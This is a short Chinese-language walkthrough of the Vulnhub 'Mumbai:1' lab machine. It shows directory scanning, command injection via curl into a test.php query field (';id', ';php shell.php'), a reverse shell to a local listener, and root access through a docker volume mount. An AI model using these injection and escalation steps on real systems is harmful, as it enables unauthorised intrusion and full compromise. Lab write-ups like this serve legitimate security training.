Mumbai:1 Vulnhub Walkthrough

靶機地址：

https://www.vulnhub.com/entry/mumbai-1,372/

主機探測：

 

主機端口掃描：

 

FTP 下載Note文件

TODO:

Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
secure - maybe this will shut those security researchers up.

Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
rebuild the server again.

- AbsoZed

意思就是可使用docker來進行提權，由於HTTP使用的是docker容器跑的

HTTP目錄掃描

 

http://10.10.203.18/drupal/

列目錄爲空

http://10.10.203.18/wordpress/ 沒法訪問

在枚舉HTTP 8000端口

dirb http://10.10.203.18:8000 -X .php,.txt,.json,.xml,.py,.yml

 

+ http://10.10.203.18:8000/keywords.py (CODE:200|SIZE:1376)
+ http://10.10.203.18:8000/test.php (CODE:200|SIZE:64)

下載兩個文件查看內容

test.php文件內容

Please POST a proper query. ex: https://caffeinatedengineers.com

keywords.py py腳本就是發送請求給URL

嘗試請求下幾個有用的URL

 

|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ＞curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]

root at Hack404 in ~
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ＞curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)

 

本地監聽1234

執行：curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php

 

獲取shell，嘗試提權操做

docker run -v /root:/mnt -it alpine

# cd /root/
cd /root/
~ # cd /mnt
cd /mnt
/mnt # ls
ls
proof.txt
/mnt # cat proof.txt

 

OVER !!